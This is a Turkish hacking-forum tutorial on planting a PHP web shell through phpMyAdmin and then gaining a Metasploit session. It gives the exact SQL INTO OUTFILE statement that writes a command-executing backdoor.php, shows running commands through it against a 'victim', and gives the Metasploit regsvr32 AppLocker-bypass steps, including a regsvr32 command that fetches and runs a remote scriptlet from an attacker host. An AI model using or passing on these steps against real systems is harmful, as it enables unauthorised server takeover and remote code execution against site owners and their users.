phpMyAdmin Shell Upload // Xowly

Xowly

Katılımcı Üye
17 Haz 2019
769
57
ғate
Merhabalar, değerli Türk Hack Team ailesi bu gün sizlere "phpMyAdmin Shell Upload" konusunu
anlatacağım. Önemli olan başlıkları inceleyelim.


6HWfbV.png


phpMyAdmin
HbfRC1.png

phpMyAdmin temelinde php ile yazılmış bir araçtır. phpMyAdmin MySQL'in yönetim birimidir. phpMyAdmin ile birçok geniş işlemler yapabilir, kolayca sistemimizde
ortaya çıkan hataları kaldırabiliriz. Veritabanları, sütunları, kullanıcıları ve dizinleri kolaylıkla kontrol edebilir, bunlar

üzerinden geniş çaplı işlemler yapabiliriz. Ayrıca phpMyAdmin php ile geliştirilen en popüler uygulamalardan biridir.
Bu uygulama üzerinden "SQL Sorguları" gönderebilir, bu sorguları görüntüleyebiliriz.



Shell
HbfRC1.png

Shell temel olarak bir atılan sitede size üst düzey yetkiler veren bir materyaldir. Pentest aşamalarında sıkça kullanılan shell size silme, yazma, okuma
gibi çeşitli yetkiler verebilir. Shell sayesinde site sahibinin yetkilerine veya host sahibinin yetkilerine ulaşım

sağlamak mümkündür. Kısacası shell kullanıldığı takdirde size "Permission Yetkisi" vermektedir. Shell atığımız zaman eğer tam
yetkimiz yok ise o zaman root olmaya çalışmak gibi çeşitli işlemler yapmamız gerekmektedir.




6HWfbV.png


Shell Atmanın Yolları

• Remote File Iclusion Vulnerability
• SQL Injection Vulnerability
• Exploits
• Upload Vulnerability
• Social Engineering

Gibi çeşitli Vulnerability, Exploits çeşitleri ve yöntemleri ile shell upload yapabiliriz.


6HWfbV.png



Konuda Geçen Başlıklar

• phpMyAdmin Nedir?

• Shell Nedir?

• Shell Atmanın Yolları

• phpMyAdmin Shell Upload Kurulumlar ve Nasıl Yapılır?




6HWfbV.png


phpMyAdmin Shell Upload Kurulumlar ve Nasıl Yapılır?


İlk olarak Xampp uygulamasını kuracağımız siteye göz atalım.​



UBUeBR.png




Daha sonra terminalimizi açıyoruz ve Xampp kurulumuna başlıyoruz.​

Kod:
wget http://downloads.sourceforge.net/project/xampp/XAMPP%20Linux/1.8.3/xampp-linux-x64-1.8.3-3-installer.run



d8RzG0.png


Şimdi yüklendiğinden emin olmak için dizinleri kontrol ediyoruz.​


Kod:
ls



z996eN.png


Dosyanın ayarlamalarını yapıyoruz.​

Kod:
sudo chmod +x xampp-linux-x64-1.8.3-3-installer.run


y8N3Bz.png


Daha sonrasında artık setup dosyamızı çalıştırıyoruz.​

Kod:
sudo ./xampp-linux-x64-1.8.3-3-installer.run


Ardından setup'a başlıyoruz. "Next" butonuna basıyoruz.

M808Va.png



Ardından gelen ekranda iki seçeneğin de seçili olduğundan emin olup "next" diyoruz.​



5a5KPf.png



Gelen ekranda "next" diyoruz.​



fA9QSd.png



Yeniden gelen ekranda "next" diyoruz.​



cG5K82.png




Bir daha "next" diyoruz.​



GACWMc.png



Yüklenmesini bekliyoruz ve yüklendikten sonra "next" diyoruz.​



BA5RUV.png



Kutucuğun seçili olduğundan emin olduktan sonra "finish" butonuna tıklıyoruz.​



dzUQd8.png



Ardından karşımıza bu sayfa çıkıyor. Burdan "phpMyAdmin" bölümüne tıklıyoruz.​



HVfxUV.png




Daha sonrasında burdan "new" butonuna tıklıyoruz.



Uz116M.jpg





Buradan üstten "SQL" yazan bölüme tıklıyoruz.




e7ISdc.jpg





SQL Bölümündeki kutucuğa kodu yazıyoruz. "Go" veya "Git" butonuna tıklıyoruz.


Kod:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"



PHK8fI.jpg




Shell'in başarıyla oluşturulduğunu kontrol amaçlı "http://192.168.1.101:81/backdoor.php" sitesine gidiyoruz. (url lhost'a göre değişir.)​




8GeQLP.jpg




Daha sonra bu "http://192.168.1.101:81/backdoor.php?cmd=dir" url'ye gidiyoruz. Kurbanımızın bilgileri karşımıza çıkıyor.​




AOzB9Q.jpg




Daha sonra araçlarımızın güncel olduğundan emin olmak için araçlarımızı güncelliyoruz. (Yapmak zorunlu değil, güncelleme yakın zamanda
yapmayanlar için hata çıkmaması amacıyla yapıyoruz.)​





a1Qf0K.png





Aracımızı açıyoruz. Ardından exploitimizi seçiyoruz.




Kod:
[COLOR="Orange"]msfconsole[/COLOR]

Kod:
use exploit/windows/misc/regsvr32_applocker_bypass_server



2JCBad.png





Kurbanımızın bilgilerini giriyoruz. (lhost değişmektedir.)



Kod:
set lhost 192.168.1.33


Kod:
set lport 4444




KLb89a.png






Daha sonra artık exploit'i çalıştırıyoruz.


Kod:
exploit



2VVTbV.jpg




Daha sonra windows'dan cmd içerisinden veya "http://192.168.1.104:8080/cmd=regsvr32 /s /n /u

i:http://192.168.1.104:8080/sVW72p3IRZBScv.sct%20scrobj.dll"
linkinden giriş gerçekleştiriyoruz.​


Kod:
regsvr32 /s /n /u / i:http://192.168.1.104:8080/sVW72p3IRZBScv.sct%20scrobj.dll


SCec86.jpg



Terminale geri döndüğümüzde bu şekilde gözükücektir.​


Kurbanımızın cihazının bilgilerini öğrenmek için "sysinfo" yazıyoruz.​


Kod:
sysinfo




x7Lc5K.jpg




Evet Türk Hack Team ailesi konum bu kadar. Bir sonraki konumda görüşmek üzere. Esenlikler.


giphy.gif
 
Moderatör tarafında düzenlendi:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.